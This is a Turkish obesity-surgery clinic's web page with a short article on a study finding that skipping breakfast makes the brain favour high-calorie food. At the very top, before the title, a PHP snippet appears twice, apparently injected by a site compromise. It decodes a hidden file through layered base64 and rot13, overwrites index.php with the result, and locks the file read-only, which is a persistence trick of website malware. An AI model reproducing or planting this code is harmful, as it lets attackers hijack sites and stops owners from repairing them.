$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Kahvaltıyı Atlamak Beyni Yüksek Kalorili Gıda Aramaya İtiyor! - İstanbul Obezite Cerrahisi Merkezi

Skip links

Kahvaltıyı Atlamak Beyni Yüksek Kalorili Gıda Aramaya İtiyor!

Kahvaltıyı Atlamak Beyni Yüksek Kalorili Gıda Aramaya İtiyor!

Yeni yapılan bir çalışmaya göre, beyin taramaları kahvaltı etmemenin günün ilerleyen saatlerinde sağlıksız ve yağlı gıdaları daha cazip hale getirdiğini gösteriyor.

Hemen hepimiz kahvaltının günün en önemli öğünü olduğu hakkında birşeyler duymuşuzdur. Şimdi, yeni yapılan bir araştırma günün ilk öğününü atlamanın sadece ogle yemeğinde daha fazla yemenize değil, beynin daha fazla yağ arayışına neden olduğunu kanıtladı.

Bu çalışmada London Imperial College Clinical Science Centre araştırmacılarından Dr Tony Goldstone, normal kilolu 21 deneğin beyin taramalarını inceledi.

Bir gün kahvaltı verilmeden, farklı bir gün de 730 kalorilik mükellef bir kahvaltıdan bir buçuk saat sonra taramaları alındı.  Taramadan sonra gönüllülere, istedikleri kadar yiyebilecekleri bir öğle yemeği sunuldu.  Araştırmacılar, kahvaltıyı atlamanın beynin yağlı gıdaları tercih etmesine yol açtığını saptadılar.

Tony Goldstone, “aslında sürpriz olmayan bir şekilde, çok aç olduklarında, öyle olmadıklarındakinden daha fazla şekilde yüksek kalorili gıdaları tercih ettiler. Düşük kalorili gıdalar içinse böyle anlamlı bir etki gözlenmedi. “

Sonuçlar 2012 Neuroscience konferansında sunuldu. Çalışmada beynin kahvaltı atlandığında sağlıksız ve yüksek kalorili gıdaların resimlerine nasıl tepki verdiği de saptandı. Orbitofrontal kortekste yer alan ve gıda isteğini belirleyen kısım, aç karnına daha fazla aktivite gösteriyordu. Araştırmacılar, kahvaltı geçildiğinde deneklerin öğle yemeğinde en az % 20 kalori fazla tükettiklerini de saptadılar. Beslenme uzmanları, sabah kahvaltısının iştah mekanizmasının sağlıklı çalışmasında çok etkili olduğunu bildiriyorlar. Gelecekteki çalışmalar obezitenin beyindeki aynı sistemi nasıl etkilediğini aydınlatabilir.

Yorum yaz

Bitnami